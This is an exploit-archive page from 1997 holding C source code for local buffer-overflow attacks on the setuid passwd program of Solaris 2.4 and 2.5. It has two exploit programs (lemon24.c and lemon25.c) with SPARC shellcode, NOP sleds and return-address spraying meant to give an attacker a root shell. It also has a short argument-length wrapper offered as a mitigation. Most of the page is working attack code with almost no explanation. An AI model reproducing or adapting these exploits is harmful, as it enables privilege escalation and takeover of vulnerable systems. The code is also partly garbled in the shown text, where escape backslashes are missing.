[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits
# Published : 1997-07-12
# Author : Cristian Schipor
# Previous Title : GnomeHack 1.0.5 Local Buffer Overflow Exploit
# Next Title : AIX 4.2 /usr/dt/bin/dtterm Local Buffer Overflow Exploit
---------------------------- file newpass.c
-------------------------------
#include <stdio.h>
#include <syslog.h>
#define hidden_passwd "/bin/hpasswd" /*change here ...*/
#define MAX_LENGTH 32
void main(int argc, char *argv[])
{
int i;
char *args[10];
if(argc < 10)
{
args[0]=hidden_passwd;
for(i = 1; i<argc; i++)
{
if(strlen(argv[i]) > MAX_LENGTH)
{
printf("You reached the maximum length in
argsn");
exit(0);
}
else args[i]=argv[i];
}
args[i]=(char *)0;
execv(args[0],args);
}
else
{
printf("You reached the maximum number of args !n");
}
}
---------------------------- end newpass.c
-----------------------------------
------------------------------ EXPLOITS ----------------------------------
------------------------------ lemon24.c --------------------------------
/*
Exploit for Solaris 2.4 ( it is a little and subtile different beetwen
this
exploit and the prog for Solaris 2.5 - the overflow buffer is shifted
with 1 char )
With argv[1] you can modify the stack_offset (+-256).
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 600
#define EXTRA 600
#define STACK_OFFSET 1400
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdaxdcxaex15xe3x68"
"x90x0bx80x0ex92x03xa0x0cx94x1ax80x0ax9cx03xa0x14"
"xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
"x91xd0x20x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/passwd", "passwd", & buf[1],(char *) 0);
perror("execl failed");
}
-------------------------------- end of lemon24.c
----------------------------
---------------------------------- lemon25.c
--------------------------------
/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 1100
#define EXTRA 1200
#define STACK_OFFSET 3800
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"x82x10x20xcaxa6x1cxc0x13x90x0cxc0x13x92x0cxc0x13"
"xa6x04xe0x01x91xd4xffxffx2dx0bxd8x9axacx15xa1x6e"
"x2fx0bxdcxdax90x0bx80x0ex92x03xa0x08x94x1ax80x0a"
"x9cx03xa0x10xecx3bxbfxf0xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd4xffxff"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/passwd", "passwd", buf,(char *) 0);
perror("execl failed");
}
----------------------------------- end of lemon25.c
// www.Syue.com [1997-07-12]